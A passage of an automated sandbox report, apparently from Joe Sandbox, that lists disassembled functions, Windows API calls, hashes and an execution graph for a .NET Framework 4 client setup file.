                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw$ByteCharH_prolog3MultiWide
                                                                                                                                                                    • String ID: _
                                                                                                                                                                    • API String ID: 3478574853-701932520
                                                                                                                                                                    • Opcode ID: 2a7aa4079981c0c29c43ddfaa896dc9a72fa5989b4bc68c6938f44d887aaeb21
                                                                                                                                                                    • Instruction ID: 993686feb2351a490f993184cbc6f77ad1f305bef3892abc5312f752c7a1e358
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7aa4079981c0c29c43ddfaa896dc9a72fa5989b4bc68c6938f44d887aaeb21
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E211DB5900646EFDB11DF58C8819EEBBF9FF58700F50882DE5599B202C374AA85CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000195C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,X?f,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?), ref: 000195E8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000,?,?,00015B53), ref: 0001960D
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000008,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018813
                                                                                                                                                                      • Part of subcall function 000187EB: HeapAlloc.KERNEL32(00000000,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 0001881A
                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00016F89,?,00000000,X?f,?,?,?,00016F09,?,?,00000000), ref: 00019607
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocCurrentDirectoryProcess$ErrorLast
                                                                                                                                                                    • String ID: X?f
                                                                                                                                                                    • API String ID: 3246529678-1642154059
                                                                                                                                                                    • Opcode ID: cc5da3860ca997bac4aefbbc6c9b059ee70601630acc8c514f9e2fe9e6040446
                                                                                                                                                                    • Instruction ID: cda7d027fabe61256992561afed15e1655c22825a9fdc994e77c89423f768237
                                                                                                                                                                    • Opcode Fuzzy Hash: cc5da3860ca997bac4aefbbc6c9b059ee70601630acc8c514f9e2fe9e6040446
                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E573D00226EBDB2197D4CD65BEEB6A49F40764F220171EA01BB240D77A9F80DAE4
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A414 Relevance: 6.3, APIs: 5, Instructions: 36memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A41C
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A43A
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A43D
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00019DA9,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A458
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,000160C2,?,?,00000000,00000000,?,?,00015AF6,X?f), ref: 0001A45B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$FreeProcess$CloseHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1236364404-0
                                                                                                                                                                    • Opcode ID: 6d159f748b49144208725e9247d14ff662cf35a84d4bfb3768a3d82187e38fc0
                                                                                                                                                                    • Instruction ID: 24737ed44550ca821608ba4d42c6d3dcfda6df834eb31beef19f12373ecea1b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d159f748b49144208725e9247d14ff662cf35a84d4bfb3768a3d82187e38fc0
                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF08C71701201ABEB606BB99C48FEA369C9FC6791B848112FA14D7080DAA4DC808AB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002F6B8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0002F6EC
                                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 0002F71F
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00018D37,?,?,00000000,?,?,?,-00000001,00018D37,?), ref: 0002F750
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00018D37,00000001,?,00000000,?,?,?,-00000001,00018D37,?), ref: 0002F7BE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                                    • Opcode ID: b463a2981301af2daa0ef5afc8a3a275442c09a6d7d77c6fec6fb1c211a0fd29
                                                                                                                                                                    • Instruction ID: 7f987867461d51eb2a8ab355a41a9eb66f9445049ddb495622f6665c84334de3
                                                                                                                                                                    • Opcode Fuzzy Hash: b463a2981301af2daa0ef5afc8a3a275442c09a6d7d77c6fec6fb1c211a0fd29
                                                                                                                                                                    • Instruction Fuzzy Hash: D231AC35A04266EFDB20DFA4E888DBE3BF5EF01390B1485B9E4658B1A1E730DD40DB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000166AE Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 67memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,0001656E,?,?,0001AFDF,00000007,?), ref: 0001671A
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,0001656E,?,?,0001AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00016721
                                                                                                                                                                      • Part of subcall function 00018E6F: GetProcessHeap.KERNEL32(00000000,?,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E79
                                                                                                                                                                      • Part of subcall function 00018E6F: HeapFree.KERNEL32(00000000,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E80
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to realloc cleanup list buffer, xrefs: 00016735
                                                                                                                                                                    • Failed to copy the file name, xrefs: 000166E0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                                                                                    • String ID: Failed to copy the file name$Failed to realloc cleanup list buffer
                                                                                                                                                                    • API String ID: 756756679-1190809427
                                                                                                                                                                    • Opcode ID: f279d3311e12a8b4ea6fcc0ac835d4496cc298a875c0fdefc78e0cb5673d3ac1
                                                                                                                                                                    • Instruction ID: b4ee893c86b0b76c390370d6a80e351742530a69acc2b4ff9657c16b9ef6420d
                                                                                                                                                                    • Opcode Fuzzy Hash: f279d3311e12a8b4ea6fcc0ac835d4496cc298a875c0fdefc78e0cb5673d3ac1
                                                                                                                                                                    • Instruction Fuzzy Hash: F51193B5904644FFEB05DFA4DD85CDEBBBDEB48314720C46AE106F7251EA369A80CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018C9A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
                                                                                                                                                                      • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00018CE0
                                                                                                                                                                    • _vswprintf_s.LIBCMT ref: 00018D32
                                                                                                                                                                      • Part of subcall function 00018836: GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018852
                                                                                                                                                                      • Part of subcall function 00018836: HeapReAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 00018859
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocSize_vswprintf_slstrlen
                                                                                                                                                                    • String ID: z
                                                                                                                                                                    • API String ID: 1418926380-1657960367
                                                                                                                                                                    • Opcode ID: 2710d5c59a4bfb40ab25e691d8e7f4d7d242ac57dabcb9d457c20e18498d29f6
                                                                                                                                                                    • Instruction ID: a6eb7a121e2a41d092fc7e9ee361a2ded1bead61f1cc17b784595610b731a20c
                                                                                                                                                                    • Opcode Fuzzy Hash: 2710d5c59a4bfb40ab25e691d8e7f4d7d242ac57dabcb9d457c20e18498d29f6
                                                                                                                                                                    • Instruction Fuzzy Hash: F131A031D00624EBCF619BA898846DDFBF4AFA5350F34C695E811EB251DA358F809B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00034740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memmove
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 4104443479-2766056989
                                                                                                                                                                    • Opcode ID: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                                                                                                                                    • Instruction ID: f0f088f89f342aa9bdd6de2d057a89d36d42c10c84c836dc33b0b4b62aa4fd5a
                                                                                                                                                                    • Opcode Fuzzy Hash: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                                                                                                                                    • Instruction Fuzzy Hash: B3319EB6900219ABDB09CF64DC80AEE73ACEF49364F054629ED15ABB01D774EE50CBD0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018B99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _vswprintf_s.LIBCMT ref: 00018C1D
                                                                                                                                                                      • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
                                                                                                                                                                      • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00018BCD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSize_vswprintf_slstrlen
                                                                                                                                                                    • String ID: z
                                                                                                                                                                    • API String ID: 3730482531-1657960367
                                                                                                                                                                    • Opcode ID: 7a368cfc030d05262fac549fafa5146c67729085ab532cf31e1c72b97b834039
                                                                                                                                                                    • Instruction ID: fa1eaa5d023d3723924dc5c90c4bde3d269eb5d66efbeb5d9f2d512146902f45
                                                                                                                                                                    • Opcode Fuzzy Hash: 7a368cfc030d05262fac549fafa5146c67729085ab532cf31e1c72b97b834039
                                                                                                                                                                    • Instruction Fuzzy Hash: 1931F531A01205DBCB609BA8C8847EE77F1AF84360F30C529E011DB251DF75CF829BA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000353BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00034D38: __getptd.LIBCMT ref: 00034D3E
                                                                                                                                                                      • Part of subcall function 00034D38: __getptd.LIBCMT ref: 00034D4E
                                                                                                                                                                    • __getptd.LIBCMT ref: 000353CB
                                                                                                                                                                      • Part of subcall function 0002A753: __getptd_noexit.LIBCMT ref: 0002A756
                                                                                                                                                                      • Part of subcall function 0002A753: __amsg_exit.LIBCMT ref: 0002A763
                                                                                                                                                                    • __getptd.LIBCMT ref: 000353D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                    • String ID: csm
                                                                                                                                                                    • API String ID: 803148776-1018135373
                                                                                                                                                                    • Opcode ID: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                                                                                                                                    • Instruction ID: 4be39662897d98e264bab707a0afec470b7aab2f11a2fa176fdf111826b96bac
                                                                                                                                                                    • Opcode Fuzzy Hash: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                                                                                                                                    • Instruction Fuzzy Hash: C1016D38801A148BCF7A9F61DC506ADB3FDAF10317FA4942DE4815A6B2CB3099E5CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018836 Relevance: 5.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018852
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 00018859
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,7FFFFFFF,00000000,?,00018D82,00000000), ref: 00018863
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00018D82,00000000), ref: 0001886A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1617791916-0
                                                                                                                                                                    • Opcode ID: 653177b41e2dcd9f9bd5fe5bba0207246c9835e8f9f72aa9ea1bd67c6dc9dc09
                                                                                                                                                                    • Instruction ID: 3392ee53b61b31ef23d424177e64bfb1b01def91136fb187e218449191e9db76
                                                                                                                                                                    • Opcode Fuzzy Hash: 653177b41e2dcd9f9bd5fe5bba0207246c9835e8f9f72aa9ea1bd67c6dc9dc09
                                                                                                                                                                    • Instruction Fuzzy Hash: B5F06535100144FBD7554F659C48AE97A7AF7C5361774C624F755C6050CE38C9C19764
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000187EB Relevance: 5.0, APIs: 4, Instructions: 28memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018813
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 0001881A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1617791916-0
                                                                                                                                                                    • Opcode ID: 3db0484e4ef10dd6e45c3082193ac24b13f0d765e605801224ec72475cb21393
                                                                                                                                                                    • Instruction ID: 28916010ba0f9306d860695481259d15a6362dac403237120bd8ef9fdaf710c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 3db0484e4ef10dd6e45c3082193ac24b13f0d765e605801224ec72475cb21393
                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE01275600040EBD7595B64AC8CAFE75ABA7C4721774C618F362C7150DE388982C760
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:20.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:5.1%
                                                                                                                                                                    Total number of Nodes:118
                                                                                                                                                                    Total number of Limit Nodes:5
                                                                                                                                                                    execution_graph 4607 ffb27e 4609 ffb2b3 WriteFile 4607->4609 4610 ffb2e5 4609->4610 4812 ffb17c 4813 ffb1be GetFileType 4812->4813 4815 ffb220 4813->4815 4611 ffae7a 4612 ffaeaf SetTimer 4611->4612 4613 ffaeda 4611->4613 4614 ffaec4 4612->4614 4613->4612 4615 ffaa7a 4616 ffaacf 4615->4616 4617 ffaaa6 SetErrorMode 4615->4617 4616->4617 4618 ffaabb 4617->4618 4748 5170d92 4749 5170db2 MapViewOfFile 4748->4749 4751 5170e39 4749->4751 4623 1132818 KiUserExceptionDispatcher 4624 113285c 4623->4624 4784 5171c1a 4785 5171c50 FormatMessageW 4784->4785 4787 5171cda 4785->4787 4720 ffb4ee 4723 ffb522 CreateMutexW 4720->4723 4722 ffb59d 4723->4722 4788 ffb5ec 4790 ffb5f9 SendMessageTimeoutA 4788->4790 4791 ffb6ad 4790->4791 4816 5171e80 4817 5171ea2 RegCreateKeyExW 4816->4817 4819 5171f4c 4817->4819 4644 ffbede 4645 ffbf0a DispatchMessageW 4644->4645 4646 ffbf33 4644->4646 4647 ffbf1f 4645->4647 4646->4645 4724 ffaadd 4726 ffab0e RegOpenKeyExW 4724->4726 4727 ffab9c 4726->4727 4648 ffa45a 4649 ffa4aa GetComputerNameW 4648->4649 4650 ffa4b8 4649->4650 4655 5171832 4656 5171861 AdjustTokenPrivileges 4655->4656 4658 5171883 4656->4658 4820 ffa35a 4821 ffa38e FindCloseChangeNotification 4820->4821 4823 ffa3c8 4821->4823 4728 517073e 4729 517075e WSASocketW 4728->4729 4731 51707d2 4729->4731 4792 ffabd5 4793 ffac16 RegQueryValueExW 4792->4793 4795 ffac9f 4793->4795 4752 51715ba 4755 51715ea WSAConnect 4752->4755 4754 517163e 4755->4754 4756 ffb24c 4757 ffb27e WriteFile 4756->4757 4759 ffb2e5 4757->4759 4760 ffae3f 4763 ffae7a SetTimer 4760->4763 4762 ffaec4 4763->4762 4732 ffbebc 4733 ffbede DispatchMessageW 4732->4733 4735 ffbf1f 4733->4735 4764 ffaa3a 4765 ffaa7a SetErrorMode 4764->4765 4767 ffaabb 4765->4767 4681 ffa9b6 4682 ffaa2c 4681->4682 4683 ffa9f4 DuplicateHandle 4681->4683 4682->4683 4684 ffaa02 4683->4684 4768 5170bdc 4769 5170c02 ConvertStringSecurityDescriptorToSecurityDescriptorW 4768->4769 4771 5170c7b 4769->4771 4772 ffa432 4773 ffa45a GetComputerNameW 4772->4773 4775 ffa4b8 4773->4775 4824 ffb327 4825 ffb362 RegSetValueExW 4824->4825 4827 ffb3e3 4825->4827 4692 ffb0a6 4694 ffb0de CreateFileW 4692->4694 4695 ffb12d 4694->4695 4736 5171b4b 4737 5171b6e SetProcessWorkingSetSize 4736->4737 4739 5171bcf 4737->4739 4696 ffb522 4697 ffb55a CreateMutexW 4696->4697 4699 ffb59d 4697->4699 4800 5171676 4802 51716b2 LookupPrivilegeValueW 4800->4802 4803 5171702 4802->4803 4740 517197d 4741 51719ae GetExitCodeProcess 4740->4741 4743 5171a0c 4741->4743 4776 51717fb 4777 5171805 AdjustTokenPrivileges 4776->4777 4779 5171883 4777->4779 4804 5171a67 4806 5171a8a GetProcessWorkingSetSize 4804->4806 4807 